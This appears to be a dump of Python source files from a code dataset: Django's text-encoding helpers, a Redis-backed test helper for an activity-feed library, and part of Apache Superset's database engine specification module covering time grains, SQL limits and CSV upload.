    error message can show what was actually passed in."""

    def __init__(self, obj, *args):
        self.obj = obj
        super(DjangoUnicodeDecodeError, self).__init__(*args)

    def __str__(self):
        base = UnicodeDecodeError.__str__(self)
        return '%s. You passed in %r (%s)' % (base, self.obj, type(self.obj))
class StrAndUnicode(object):
    """
    A class that derives __str__ from __unicode__.

    On Python 2, __str__ returns the output of __unicode__ encoded as a UTF-8
    bytestring. On Python 3, __str__ returns the output of __unicode__.

    Useful as a mix-in. If you support Python 2 and 3 with a single code base,
    you can inherit this mix-in and just define __unicode__.
    """
    def __init__(self, *args, **kwargs):
        # Deprecated: point users at the @python_2_unicode_compatible decorator.
        warnings.warn("StrAndUnicode is deprecated. Define a __str__ method "
                      "and apply the @python_2_unicode_compatible decorator "
                      "instead.", DeprecationWarning, stacklevel=2)
        super(StrAndUnicode, self).__init__(*args, **kwargs)

    # The right __str__ is picked once, while the class body executes.
    if six.PY3:
        def __str__(self):
            return self.__unicode__()
    else:
        def __str__(self):
            return self.__unicode__().encode('utf-8')
def python_2_unicode_compatible(klass):
    """
    A decorator that defines __unicode__ and __str__ methods under Python 2.
    Under Python 3 it does nothing.

    To support Python 2 and 3 with a single code base, define a __str__ method
    returning text and apply this decorator to the class.
    """
    if not six.PY2:
        # Python 3: __str__ already returns text, nothing to rewire.
        return klass
    if '__str__' not in klass.__dict__:
        raise ValueError("@python_2_unicode_compatible cannot be applied "
                         "to %s because it doesn't define __str__()." %
                         klass.__name__)
    klass.__unicode__ = klass.__str__
    klass.__str__ = lambda self: self.__unicode__().encode('utf-8')
    return klass
def smart_text(s, encoding='utf-8', strings_only=False, errors='strict'):
    """
    Returns a text object representing 's' -- unicode on Python 2 and str on
    Python 3. Treats bytestrings using the 'encoding' codec.

    If strings_only is True, don't convert (some) non-string-like objects.
    """
    # Lazy gettext_lazy() results are returned untouched so they stay lazy.
    is_lazy = isinstance(s, Promise)
    return s if is_lazy else force_text(s, encoding, strings_only, errors)
def is_protected_type(obj):
    """Determine if the object instance is of a protected type.

    Objects of protected types are preserved as-is when passed to
    force_text(strings_only=True).
    """
    protected = six.integer_types + (
        type(None), float, Decimal,
        datetime.datetime, datetime.date, datetime.time,
    )
    return isinstance(obj, protected)
def force_text(s, encoding='utf-8', strings_only=False, errors='strict'):
    """
    Similar to smart_text, except that lazy instances are resolved to
    strings, rather than kept as lazy objects.

    If strings_only is True, don't convert (some) non-string-like objects.

    :param s: object to coerce to text
    :param encoding: codec used to decode bytestrings
    :param strings_only: if True, protected types (see is_protected_type)
        are returned unchanged
    :param errors: error mode passed to the decoder
    :raises DjangoUnicodeDecodeError: when a bytestring cannot be decoded
    """
    # Handle the common case first, saves 30-40% when s is an instance of
    # six.text_type. This function gets called often in that setting.
    if isinstance(s, six.text_type):
        return s
    if strings_only and is_protected_type(s):
        return s
    try:
        if not isinstance(s, six.string_types):
            # Non-string object: prefer its __unicode__, otherwise go
            # through the text constructor (decoding bytes on PY3, or
            # stringifying via bytes() on PY2).
            if hasattr(s, '__unicode__'):
                s = s.__unicode__()
            else:
                if six.PY3:
                    if isinstance(s, bytes):
                        s = six.text_type(s, encoding, errors)
                    else:
                        s = six.text_type(s)
                else:
                    s = six.text_type(bytes(s), encoding, errors)
        else:
            # Note: We use .decode() here, instead of six.text_type(s, encoding,
            # errors), so that if s is a SafeBytes, it ends up being a
            # SafeText at the end.
            s = s.decode(encoding, errors)
    except UnicodeDecodeError as e:
        if not isinstance(s, Exception):
            raise DjangoUnicodeDecodeError(s, *e.args)
        else:
            # If we get to here, the caller has passed in an Exception
            # subclass populated with non-ASCII bytestring data without a
            # working unicode method. Try to handle this without raising a
            # further exception by individually forcing the exception args
            # to unicode.
            s = ' '.join([force_text(arg, encoding, strings_only,
                                     errors) for arg in s])
    return s
def smart_bytes(s, encoding='utf-8', strings_only=False, errors='strict'):
    """
    Returns a bytestring version of 's', encoded as specified in 'encoding'.

    If strings_only is True, don't convert (some) non-string-like objects.
    """
    # Lazy gettext_lazy() results pass through untouched so they stay lazy.
    is_lazy = isinstance(s, Promise)
    return s if is_lazy else force_bytes(s, encoding, strings_only, errors)
def force_bytes(s, encoding='utf-8', strings_only=False, errors='strict'):
    """
    Similar to smart_bytes, except that lazy instances are resolved to
    strings, rather than kept as lazy objects.

    If strings_only is True, don't convert (some) non-string-like objects.

    :param s: object to coerce to bytes
    :param encoding: target codec for the resulting bytestring
    :param strings_only: if True, None and ints are returned unchanged
    :param errors: error mode passed to the encoder/decoder
    """
    if isinstance(s, six.memoryview):
        s = bytes(s)
    if isinstance(s, bytes):
        if encoding == 'utf-8':
            return s
        else:
            # Transcode: existing bytes are assumed to be UTF-8.
            return s.decode('utf-8', errors).encode(encoding, errors)
    if strings_only and (s is None or isinstance(s, int)):
        return s
    if isinstance(s, Promise):
        # Resolve the lazy translation, then encode it.
        return six.text_type(s).encode(encoding, errors)
    if not isinstance(s, six.string_types):
        try:
            if six.PY3:
                return six.text_type(s).encode(encoding)
            else:
                return bytes(s)
        except UnicodeEncodeError:
            if isinstance(s, Exception):
                # An Exception subclass containing non-ASCII data that doesn't
                # know how to print itself properly. We shouldn't raise a
                # further exception.
                return b' '.join([force_bytes(arg, encoding, strings_only,
                                              errors) for arg in s])
            return six.text_type(s).encode(encoding, errors)
    else:
        return s.encode(encoding, errors)
# Choose the "native string" helpers once at import time: on Python 3 the
# native str is text, on Python 2 it is bytes.
if six.PY3:
    smart_str = smart_text
    force_str = force_text
else:
    smart_str = smart_bytes
    force_str = force_bytes
    # backwards compatibility for Python 2
    smart_unicode = smart_text
    force_unicode = force_text

smart_str.__doc__ = """\
Apply smart_text in Python 3 and smart_bytes in Python 2.

This is suitable for writing to sys.stdout (for instance).
"""

force_str.__doc__ = """\
Apply force_text in Python 3 and force_bytes in Python 2.
"""
def iri_to_uri(iri):
    """
    Convert an Internationalized Resource Identifier (IRI) portion to a URI
    portion that is suitable for inclusion in a URL.

    This follows the algorithm from section 3.1 of RFC 3987; because the
    input is assumed to be UTF-8 or unicode already, it reduces to
    percent-encoding everything outside a fixed safe set.

    Returns an ASCII string containing the encoded result, or None when
    given None.
    """
    if iri is None:
        return iri
    # The safe set is the RFC 3986 "reserved" plus "unreserved" characters
    # (sections 2.2 / 2.3); of the unreserved ones urllib.quote already
    # treats everything but ~ as safe. The % character is included too,
    # because the end of RFC 3987 section 3.1 forbids re-encoding octets
    # that are already percent-encoded.
    return quote(force_bytes(iri), safe=b"/#%[]=:;$&()+,!?*@'~")
def filepath_to_uri(path):
    """
    Convert a file system path to a URI portion that is suitable for
    inclusion in a URL. The input is assumed to be UTF-8 or unicode already.

    Certain characters that would normally be special in URIs are encoded.
    The ' character is deliberately left unencoded since it is valid inside
    a URI (compare JavaScript's encodeURIComponent()).

    Returns an ASCII string containing the encoded result, or None when
    given None.
    """
    if path is None:
        return path
    # Backslashes are normalized to forward slashes directly rather than via
    # os.sep/os.altsep, keeping hardcoded separators working on any platform.
    return quote(force_bytes(path).replace(b"\\", b"/"), safe=b"/~!*()'")
def get_system_encoding():
    """
    Return the encoding of the default system locale, falling back to
    'ascii' when the encoding cannot be determined or is unknown to
    Python's codec registry. See tickets #10335 and #5846.
    """
    try:
        enc = locale.getdefaultlocale()[1] or 'ascii'
        # Validate the name; codecs.lookup raises for unknown encodings.
        codecs.lookup(enc)
    except Exception:
        enc = 'ascii'
    return enc
# Computed once at import time; the system locale is not expected to change
# during the lifetime of the process.
DEFAULT_LOCALE_ENCODING = get_system_encoding()
| apache-2.0 |
simonz05/activity-feed | tests/helper.py | 1 | 1025 | import unittest
import datetime
from activity_feed import ActivityFeed
from activity_feed.utils import datetime_to_timestamp, utcnow
def timestamp(*args):
    """Build a datetime from the given components and return its timestamp."""
    dt = datetime.datetime(*args)
    return datetime_to_timestamp(dt)
def timestamp_utcnow():
    """Return the current UTC time as a timestamp."""
    now = utcnow()
    return datetime_to_timestamp(now)
class BaseTest(unittest.TestCase):
    """Base test case providing a clean ActivityFeed backed by local redis.

    NOTE(review): requires a reachable redis server on localhost:6379 and
    uses database 15 so test data stays separate from real data.
    """
    def setUp(self):
        self.a = ActivityFeed(redis='redis://:@localhost:6379/15')
        self._empty()

    def _empty(self):
        # Delete every key under this feed's namespace so tests start clean.
        a = self.a
        keys = a.redis.keys('{}*'.format(a.namespace))
        if keys:
            a.redis.delete(*keys)

    def add_items_to_feed(self, user_id, items_to_add=5, aggregate=None):
        """Helper method to add items to a given feed.

        Items get ids 1..items_to_add with timestamps spaced 5 units apart.

        :param items_to_add: [int] Number of items to add to the feed.
        :param aggregate: aggregation flag; defaults to the feed's setting.
        """
        if aggregate is None:
            aggregate = self.a.aggregate
        now = timestamp_utcnow()
        for i in range(1, items_to_add + 1):
            self.a.update_item(user_id, i, now, aggregate)
            now += 5
| mit |
dmigo/incubator-superset | superset/db_engine_specs.py | 1 | 56036 | # -*- coding: utf-8 -*-
# pylint: disable=C,R,W
"""Compatibility layer for different database engines
This modules stores logic specific to different database engines. Things
like time-related functions that are similar but not identical, or
information as to expose certain features or not and how to expose them.
For instance, Hive/Presto supports partitions and have a specific API to
list partitions. Other databases like Vertica also support partitions but
have different API to get to them. Other databases don't support partitions
at all. The classes here will use a common interface to specify all this.
The general idea is to use static classes and an inheritance scheme.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import defaultdict, namedtuple
import inspect
import logging
import os
import re
import textwrap
import time
import boto3
from flask import g
from flask_babel import lazy_gettext as _
import pandas
import sqlalchemy as sqla
from sqlalchemy import select
from sqlalchemy.engine import create_engine
from sqlalchemy.engine.url import make_url
from sqlalchemy.sql import text
from sqlalchemy.sql.expression import TextAsFrom
import sqlparse
from tableschema import Table
from werkzeug.utils import secure_filename
from superset import app, cache_util, conf, db, utils
from superset.exceptions import SupersetTemplateException
from superset.utils import QueryStatus
# Module-level handles on the Flask app configuration.
config = app.config
tracking_url_trans = conf.get('TRACKING_URL_TRANSFORMER')
hive_poll_interval = conf.get('HIVE_POLL_INTERVAL')

# A supported time granularity: display name, localized label, SQL expression
# template (with a {col} placeholder) and ISO 8601 duration string.
Grain = namedtuple('Grain', 'name label function duration')
class LimitMethod(object):
    """Enum the ways that limits can be applied"""
    FETCH_MANY = 'fetch_many'    # fetch at most `limit` rows from the cursor
    WRAP_SQL = 'wrap_sql'        # wrap the query in an outer SELECT ... LIMIT
    FORCE_LIMIT = 'force_limit'  # rewrite/append the LIMIT clause in the SQL text
class BaseEngineSpec(object):
    """Abstract class for database engine specific configurations"""

    engine = 'base'  # str as defined in sqlalchemy.engine.engine
    # Extra kwargs passed along to cursor.execute().
    cursor_execute_kwargs = {}
    # Tuple of Grain namedtuples describing the supported time granularities.
    time_grains = tuple()
    time_groupby_inline = False
    # How row limits are enforced for this engine (see LimitMethod).
    limit_method = LimitMethod.FORCE_LIMIT
    time_secondary_columns = False
    inner_joins = True

    @classmethod
    def fetch_data(cls, cursor, limit):
        """Fetch rows from an executed cursor, honoring the limit method."""
        if cls.limit_method == LimitMethod.FETCH_MANY:
            return cursor.fetchmany(limit)
        return cursor.fetchall()

    @classmethod
    def epoch_to_dttm(cls):
        """Return a SQL template (with {col}) converting epoch seconds to a
        datetime; must be provided by each concrete engine spec."""
        raise NotImplementedError()

    @classmethod
    def epoch_ms_to_dttm(cls):
        """Same as epoch_to_dttm but for columns holding epoch milliseconds."""
        return cls.epoch_to_dttm().replace('{col}', '({col}/1000.0)')

    @classmethod
    def extra_table_metadata(cls, database, table_name, schema_name):
        """Returns engine-specific table metadata"""
        return {}

    @classmethod
    def apply_limit_to_sql(cls, sql, limit, database):
        """Alters the SQL statement to apply a LIMIT clause"""
        if cls.limit_method == LimitMethod.WRAP_SQL:
            sql = sql.strip('\t\n ;')
            qry = (
                select('*')
                .select_from(
                    TextAsFrom(text(sql), ['*']).alias('inner_qry'),
                )
                .limit(limit)
            )
            return database.compile_sqla_query(qry)
        # NOTE(review): this tests the truthy string constant, not
        # `cls.limit_method == LimitMethod.FORCE_LIMIT`, so every
        # non-WRAP_SQL engine (including FETCH_MANY ones) takes this branch
        # and the trailing `return sql` is unreachable — confirm intended.
        elif LimitMethod.FORCE_LIMIT:
            sql_without_limit = cls.get_query_without_limit(sql)
            return '{sql_without_limit} LIMIT {limit}'.format(**locals())
        return sql

    @classmethod
    def get_limit_from_sql(cls, sql):
        """Return the LIMIT value from a trailing LIMIT clause, or None."""
        limit_pattern = re.compile(r"""
        (?ix)           # case insensitive, verbose
        \s+             # whitespace
        LIMIT\s+(\d+)   # LIMIT $ROWS
        ;?              # optional semi-colon
        (\s|;)*$        # remove trailing spaces tabs or semicolons
        """)
        matches = limit_pattern.findall(sql)
        if matches:
            return int(matches[0][0])

    @classmethod
    def get_query_without_limit(cls, sql):
        """Return the SQL with any trailing LIMIT clause stripped off."""
        return re.sub(r"""
        (?ix)           # case insensitive, verbose
        \s+             # whitespace
        LIMIT\s+\d+     # LIMIT $ROWS
        ;?              # optional semi-colon
        (\s|;)*$        # remove trailing spaces tabs or semicolons
        """, '', sql)

    @staticmethod
    def csv_to_df(**kwargs):
        """Read an uploaded CSV (path relative to UPLOAD_FOLDER) into a
        single pandas DataFrame, reading in chunks to bound memory."""
        kwargs['filepath_or_buffer'] = \
            config['UPLOAD_FOLDER'] + kwargs['filepath_or_buffer']
        kwargs['encoding'] = 'utf-8'
        kwargs['iterator'] = True
        chunks = pandas.read_csv(**kwargs)
        df = pandas.DataFrame()
        df = pandas.concat(chunk for chunk in chunks)
        return df

    @staticmethod
    def df_to_db(df, table, **kwargs):
        """Write a DataFrame to the database and register/refresh the
        corresponding Superset table metadata."""
        df.to_sql(**kwargs)
        table.user_id = g.user.id
        table.schema = kwargs['schema']
        table.fetch_metadata()
        db.session.add(table)
        db.session.commit()

    @staticmethod
    def create_table_from_csv(form, table):
        """Create a physical table from an uploaded CSV described by `form`."""
        def _allowed_file(filename):
            # Only allow specific file extensions as specified in the config
            extension = os.path.splitext(filename)[1]
            return extension and extension[1:] in config['ALLOWED_EXTENSIONS']
        filename = secure_filename(form.csv_file.data.filename)
        if not _allowed_file(filename):
            raise Exception('Invalid file type selected')
        kwargs = {
            'filepath_or_buffer': filename,
            'sep': form.sep.data,
            'header': form.header.data if form.header.data else 0,
            'index_col': form.index_col.data,
            'mangle_dupe_cols': form.mangle_dupe_cols.data,
            'skipinitialspace': form.skipinitialspace.data,
            'skiprows': form.skiprows.data,
            'nrows': form.nrows.data,
            'skip_blank_lines': form.skip_blank_lines.data,
            'parse_dates': form.parse_dates.data,
            'infer_datetime_format': form.infer_datetime_format.data,
            'chunksize': 10000,
        }
        df = BaseEngineSpec.csv_to_df(**kwargs)
        df_to_db_kwargs = {
            'table': table,
            'df': df,
            'name': form.name.data,
            'con': create_engine(form.con.data.sqlalchemy_uri_decrypted, echo=False),
            'schema': form.schema.data,
            'if_exists': form.if_exists.data,
            'index': form.index.data,
            'index_label': form.index_label.data,
            'chunksize': 10000,
        }
        BaseEngineSpec.df_to_db(**df_to_db_kwargs)

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        """Render `dttm` as a SQL literal appropriate for `target_type`."""
        return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))

    @classmethod
    @cache_util.memoized_func(
        timeout=600,
        key=lambda *args, **kwargs: 'db:{}:{}'.format(args[0].id, args[1]))
    def fetch_result_sets(cls, db, datasource_type, force=False):
        """Returns the dictionary {schema : [result_set_name]}.

        Datasource_type can be 'table' or 'view'.
        Empty schema corresponds to the list of full names of the all
        tables or views: <schema>.<result_set_name>.
        """
        schemas = db.inspector.get_schema_names()
        result_sets = {}
        all_result_sets = []
        for schema in schemas:
            if datasource_type == 'table':
                result_sets[schema] = sorted(
                    db.inspector.get_table_names(schema))
            elif datasource_type == 'view':
                result_sets[schema] = sorted(
                    db.inspector.get_view_names(schema))
            all_result_sets += [
                '{}.{}'.format(schema, t) for t in result_sets[schema]]
        if all_result_sets:
            result_sets[''] = all_result_sets
        return result_sets

    @classmethod
    def handle_cursor(cls, cursor, query, session):
        """Handle a live cursor between the execute and fetchall calls

        The flow works without this method doing anything, but it allows
        for handling the cursor and updating progress information in the
        query object"""
        pass

    @classmethod
    def extract_error_message(cls, e):
        """Extract error message for queries"""
        return utils.error_msg_from_exception(e)

    @classmethod
    def adjust_database_uri(cls, uri, selected_schema):
        """Based on a URI and selected schema, return a new URI

        The URI here represents the URI as entered when saving the database,
        ``selected_schema`` is the schema currently active presumably in
        the SQL Lab dropdown. Based on that, for some database engine,
        we can return a new altered URI that connects straight to the
        active schema, meaning the users won't have to prefix the object
        names by the schema name.

        Some databases engines have 2 level of namespacing: database and
        schema (postgres, oracle, mssql, ...)
        For those it's probably better to not alter the database
        component of the URI with the schema name, it won't work.

        Some database drivers like presto accept '{catalog}/{schema}' in
        the database component of the URL, that can be handled here.
        """
        return uri

    @classmethod
    def patch(cls):
        # Hook for engine-specific monkey-patching; no-op by default.
        pass

    @classmethod
    def get_schema_names(cls, inspector):
        """List schema names via the SQLAlchemy inspector."""
        return inspector.get_schema_names()

    @classmethod
    def get_table_names(cls, schema, inspector):
        """List table names in `schema`, sorted alphabetically."""
        return sorted(inspector.get_table_names(schema))

    @classmethod
    def where_latest_partition(
            cls, table_name, schema, database, qry, columns=None):
        """Return `qry` filtered to the latest partition, or False when the
        engine has no partition support (the default)."""
        return False

    @classmethod
    def select_star(cls, my_db, table_name, engine, schema=None, limit=100,
                    show_cols=False, indent=True, latest_partition=True,
                    cols=None):
        """Build a "SELECT * FROM table LIMIT n" statement for SQL Lab,
        optionally expanding columns, quoting identifiers, filtering to the
        latest partition and pretty-printing the result."""
        fields = '*'
        cols = cols or []
        if (show_cols or latest_partition) and not cols:
            cols = my_db.get_columns(table_name, schema)
        if show_cols:
            fields = [sqla.column(c.get('name')) for c in cols]
        full_table_name = table_name
        quote = engine.dialect.identifier_preparer.quote
        if schema:
            full_table_name = quote(schema) + '.' + quote(table_name)
        else:
            full_table_name = quote(table_name)
        qry = select(fields).select_from(text(full_table_name))
        if limit:
            qry = qry.limit(limit)
        if latest_partition:
            partition_query = cls.where_latest_partition(
                table_name, schema, my_db, qry, columns=cols)
            # where_latest_partition returns False when unsupported.
            if partition_query != False:  # noqa
                qry = partition_query
        sql = my_db.compile_sqla_query(qry)
        if indent:
            sql = sqlparse.format(sql, reindent=True)
        return sql

    @classmethod
    def modify_url_for_impersonation(cls, url, impersonate_user, username):
        """
        Modify the SQL Alchemy URL object with the user to impersonate if applicable.

        :param url: SQLAlchemy URL object
        :param impersonate_user: Bool indicating if impersonation is enabled
        :param username: Effective username
        """
        if impersonate_user is not None and username is not None:
            url.username = username

    @classmethod
    def get_configuration_for_impersonation(cls, uri, impersonate_user, username):
        """
        Return a configuration dictionary that can be merged with other configs
        that can set the correct properties for impersonating users

        :param uri: URI string
        :param impersonate_user: Bool indicating if impersonation is enabled
        :param username: Effective username
        :return: Dictionary with configs required for impersonation
        """
        return {}

    @classmethod
    def get_normalized_column_names(cls, cursor_description):
        """Normalize every column name in a DB-API cursor description."""
        columns = cursor_description if cursor_description else []
        return [cls.normalize_column_name(col[0]) for col in columns]

    @staticmethod
    def normalize_column_name(column_name):
        # Identity by default; engines override to e.g. lower-case names.
        return column_name
class PostgresBaseEngineSpec(BaseEngineSpec):
    """ Abstract class for Postgres 'like' databases """
    engine = ''
    # DATE_TRUNC based grains, rendered in UTC.
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('second', _('second'),
              "DATE_TRUNC('second', {col}) AT TIME ZONE 'UTC'", 'PT1S'),
        Grain('minute', _('minute'),
              "DATE_TRUNC('minute', {col}) AT TIME ZONE 'UTC'", 'PT1M'),
        Grain('hour', _('hour'),
              "DATE_TRUNC('hour', {col}) AT TIME ZONE 'UTC'", 'PT1H'),
        Grain('day', _('day'),
              "DATE_TRUNC('day', {col}) AT TIME ZONE 'UTC'", 'P1D'),
        Grain('week', _('week'),
              "DATE_TRUNC('week', {col}) AT TIME ZONE 'UTC'", 'P1W'),
        Grain('month', _('month'),
              "DATE_TRUNC('month', {col}) AT TIME ZONE 'UTC'", 'P1M'),
        Grain('quarter', _('quarter'),
              "DATE_TRUNC('quarter', {col}) AT TIME ZONE 'UTC'", 'P0.25Y'),
        Grain('year', _('year'),
              "DATE_TRUNC('year', {col}) AT TIME ZONE 'UTC'", 'P1Y'),
    )

    @classmethod
    def fetch_data(cls, cursor, limit):
        # Statements that return no rows leave cursor.description empty;
        # short-circuit instead of calling fetch* on them.
        if not cursor.description:
            return []
        if cls.limit_method == LimitMethod.FETCH_MANY:
            return cursor.fetchmany(limit)
        return cursor.fetchall()

    @classmethod
    def epoch_to_dttm(cls):
        return "(timestamp 'epoch' + {col} * interval '1 second')"

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))
class PostgresEngineSpec(PostgresBaseEngineSpec):
    """Plain PostgreSQL: Postgres-like base behavior plus foreign tables."""
    engine = 'postgresql'

    @classmethod
    def get_table_names(cls, schema, inspector):
        """Need to consider foreign tables for PostgreSQL"""
        names = list(inspector.get_table_names(schema))
        names += inspector.get_foreign_table_names(schema)
        return sorted(names)
class SnowflakeEngineSpec(PostgresBaseEngineSpec):
    """Snowflake: Postgres-like, but with its own DATE_TRUNC grain syntax."""
    engine = 'snowflake'
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('second', _('second'), "DATE_TRUNC('SECOND', {col})", 'PT1S'),
        Grain('minute', _('minute'), "DATE_TRUNC('MINUTE', {col})", 'PT1M'),
        Grain('hour', _('hour'), "DATE_TRUNC('HOUR', {col})", 'PT1H'),
        Grain('day', _('day'), "DATE_TRUNC('DAY', {col})", 'P1D'),
        Grain('week', _('week'), "DATE_TRUNC('WEEK', {col})", 'P1W'),
        Grain('month', _('month'), "DATE_TRUNC('MONTH', {col})", 'P1M'),
        Grain('quarter', _('quarter'), "DATE_TRUNC('QUARTER', {col})", 'P0.25Y'),
        Grain('year', _('year'), "DATE_TRUNC('YEAR', {col})", 'P1Y'),
    )

    @staticmethod
    def normalize_column_name(column_name):
        # Normalize column names to lower case.
        return column_name.lower()
class VerticaEngineSpec(PostgresBaseEngineSpec):
    # Inherits all behavior from the Postgres-like base; only the name differs.
    engine = 'vertica'
class RedshiftEngineSpec(PostgresBaseEngineSpec):
    # Inherits all behavior from the Postgres-like base; only the name differs.
    engine = 'redshift'
class OracleEngineSpec(PostgresBaseEngineSpec):
    """Oracle: limits are applied by wrapping the query (WRAP_SQL)."""
    engine = 'oracle'
    limit_method = LimitMethod.WRAP_SQL
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('minute', _('minute'), "TRUNC(TO_DATE({col}), 'MI')", 'PT1M'),
        Grain('hour', _('hour'), "TRUNC(TO_DATE({col}), 'HH')", 'PT1H'),
        Grain('day', _('day'), "TRUNC(TO_DATE({col}), 'DDD')", 'P1D'),
        Grain('week', _('week'), "TRUNC(TO_DATE({col}), 'WW')", 'P1W'),
        Grain('month', _('month'), "TRUNC(TO_DATE({col}), 'MONTH')", 'P1M'),
        Grain('quarter', _('quarter'), "TRUNC(TO_DATE({col}), 'Q')", 'P0.25Y'),
        Grain('year', _('year'), "TRUNC(TO_DATE({col}), 'YEAR')", 'P1Y'),
    )

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        # Render as an explicit TO_TIMESTAMP with microsecond precision.
        return (
            """TO_TIMESTAMP('{}', 'YYYY-MM-DD"T"HH24:MI:SS.ff6')"""
        ).format(dttm.isoformat())

    @staticmethod
    def normalize_column_name(column_name):
        # Normalize column names to lower case.
        return column_name.lower()
class Db2EngineSpec(BaseEngineSpec):
    """IBM DB2: truncation is expressed with date-part subtraction; limits
    are applied by wrapping the query (WRAP_SQL)."""
    engine = 'ibm_db_sa'
    limit_method = LimitMethod.WRAP_SQL
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('second', _('second'),
              'CAST({col} as TIMESTAMP)'
              ' - MICROSECOND({col}) MICROSECONDS',
              'PT1S'),
        Grain('minute', _('minute'),
              'CAST({col} as TIMESTAMP)'
              ' - SECOND({col}) SECONDS'
              ' - MICROSECOND({col}) MICROSECONDS',
              'PT1M'),
        Grain('hour', _('hour'),
              'CAST({col} as TIMESTAMP)'
              ' - MINUTE({col}) MINUTES'
              ' - SECOND({col}) SECONDS'
              ' - MICROSECOND({col}) MICROSECONDS ',
              'PT1H'),
        Grain('day', _('day'),
              'CAST({col} as TIMESTAMP)'
              ' - HOUR({col}) HOURS'
              ' - MINUTE({col}) MINUTES'
              ' - SECOND({col}) SECONDS'
              ' - MICROSECOND({col}) MICROSECONDS ',
              'P1D'),
        Grain('week', _('week'),
              '{col} - (DAYOFWEEK({col})) DAYS',
              'P1W'),
        Grain('month', _('month'),
              '{col} - (DAY({col})-1) DAYS',
              'P1M'),
        Grain('quarter', _('quarter'),
              '{col} - (DAY({col})-1) DAYS'
              ' - (MONTH({col})-1) MONTHS'
              ' + ((QUARTER({col})-1) * 3) MONTHS',
              'P0.25Y'),
        Grain('year', _('year'),
              '{col} - (DAY({col})-1) DAYS'
              ' - (MONTH({col})-1) MONTHS',
              'P1Y'),
    )

    @classmethod
    def epoch_to_dttm(cls):
        return "(TIMESTAMP('1970-01-01', '00:00:00') + {col} SECONDS)"

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        # DB2 timestamp literal format: YYYY-MM-DD-HH.MM.SS
        return "'{}'".format(dttm.strftime('%Y-%m-%d-%H.%M.%S'))
class SqliteEngineSpec(BaseEngineSpec):
    """SQLite: single-schema engine; grains built with strftime/DATE."""
    engine = 'sqlite'
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('hour', _('hour'),
              "DATETIME(STRFTIME('%Y-%m-%dT%H:00:00', {col}))",
              'PT1H'),
        Grain('day', _('day'), 'DATE({col})', 'P1D'),
        Grain('week', _('week'),
              "DATE({col}, -strftime('%W', {col}) || ' days')",
              'P1W'),
        Grain('month', _('month'),
              "DATE({col}, -strftime('%d', {col}) || ' days', '+1 day')",
              'P1M'),
        Grain('year', _('year'),
              "DATETIME(STRFTIME('%Y-01-01T00:00:00', {col}))",
              'P1Y'),
        Grain('week_ending_saturday', _('week_ending_saturday'),
              "DATE({col}, 'weekday 6')",
              'P1W/1970-01-03T00:00:00Z'),
        Grain('week_start_sunday', _('week_start_sunday'),
              "DATE({col}, 'weekday 0', '-7 days')",
              '1969-12-28T00:00:00Z/P1W'),
    )

    @classmethod
    def epoch_to_dttm(cls):
        return "datetime({col}, 'unixepoch')"

    @classmethod
    @cache_util.memoized_func(
        timeout=600,
        key=lambda *args, **kwargs: 'db:{}:{}'.format(args[0].id, args[1]))
    def fetch_result_sets(cls, db, datasource_type, force=False):
        """Single-schema variant of BaseEngineSpec.fetch_result_sets.

        NOTE(review): assumes the inspector reports at least one schema
        (schemas[0]) and that datasource_type is 'table' or 'view';
        anything else would raise here — confirm callers guarantee this.
        """
        schemas = db.inspector.get_schema_names()
        result_sets = {}
        all_result_sets = []
        schema = schemas[0]
        if datasource_type == 'table':
            result_sets[schema] = sorted(db.inspector.get_table_names())
        elif datasource_type == 'view':
            result_sets[schema] = sorted(db.inspector.get_view_names())
        all_result_sets += [
            '{}.{}'.format(schema, t) for t in result_sets[schema]]
        if all_result_sets:
            result_sets[''] = all_result_sets
        return result_sets

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        iso = dttm.isoformat().replace('T', ' ')
        # isoformat() omits microseconds when they are zero; pad them back.
        if '.' not in iso:
            iso += '.000000'
        return "'{}'".format(iso)

    @classmethod
    def get_table_names(cls, schema, inspector):
        """Need to disregard the schema for Sqlite"""
        return sorted(inspector.get_table_names())
class MySQLEngineSpec(BaseEngineSpec):
    """MySQL: grains built via DATE_ADD/DATE_SUB arithmetic."""
    engine = 'mysql'
    cursor_execute_kwargs = {'args': {}}
    time_grains = (
        Grain('Time Column', _('Time Column'), '{col}', None),
        Grain('second', _('second'), 'DATE_ADD(DATE({col}), '
              'INTERVAL (HOUR({col})*60*60 + MINUTE({col})*60'
              ' + SECOND({col})) SECOND)',
              'PT1S'),
        Grain('minute', _('minute'), 'DATE_ADD(DATE({col}), '
              'INTERVAL (HOUR({col})*60 + MINUTE({col})) MINUTE)',
              'PT1M'),
        Grain('hour', _('hour'), 'DATE_ADD(DATE({col}), '
              'INTERVAL HOUR({col}) HOUR)',
              'PT1H'),
        Grain('day', _('day'), 'DATE({col})', 'P1D'),
        Grain('week', _('week'), 'DATE(DATE_SUB({col}, '
              'INTERVAL DAYOFWEEK({col}) - 1 DAY))',
              'P1W'),
        Grain('month', _('month'), 'DATE(DATE_SUB({col}, '
              'INTERVAL DAYOFMONTH({col}) - 1 DAY))',
              'P1M'),
        Grain('quarter', _('quarter'), 'MAKEDATE(YEAR({col}), 1) '
              '+ INTERVAL QUARTER({col}) QUARTER - INTERVAL 1 QUARTER',
              'P0.25Y'),
        Grain('year', _('year'), 'DATE(DATE_SUB({col}, '
              'INTERVAL DAYOFYEAR({col}) - 1 DAY))',
              'P1Y'),
        Grain('week_start_monday', _('week_start_monday'),
              'DATE(DATE_SUB({col}, '
              'INTERVAL DAYOFWEEK(DATE_SUB({col}, INTERVAL 1 DAY)) - 1 DAY))',
              'P1W'),
    )

    @classmethod
    def convert_dttm(cls, target_type, dttm):
        if target_type.upper() in ('DATETIME', 'DATE'):
            return "STR_TO_DATE('{}', '%Y-%m-%d %H:%i:%s')".format(
                dttm.strftime('%Y-%m-%d %H:%M:%S'))
        return "'{}'".format(dttm.strftime('%Y-%m-%d %H:%M:%S'))

